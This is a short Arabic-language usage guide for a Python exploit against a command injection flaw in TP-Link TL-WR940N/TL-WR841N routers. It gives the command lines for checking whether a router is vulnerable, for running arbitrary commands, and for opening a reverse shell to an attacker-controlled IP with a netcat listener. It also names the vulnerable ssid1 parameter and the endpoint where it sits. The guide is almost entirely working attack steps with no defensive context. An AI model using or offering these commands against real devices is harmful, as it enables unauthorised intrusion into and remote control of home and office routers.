
استغلال Python لثغرة حقن الأوامر في TP-Link TL-WR940N/TL-WR841N
التحقق الأساسي من الثغرة:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
تنفيذ أمر مخصص:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
قشرة عكسية (قم بإعداد المستمع أولاً باستخدام nc -lvnp 4444):
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
ملاحظات هامة:
توجد الثغرة بسبب عدم تنقية المدخلات بشكل صحيح في معامل ssid1 لنقطة النهاية /userRpm/WlanNetworkRpm.htm، مما يسمح بحقن الأوامر من خلال طلبات مُعدة خصيصًا.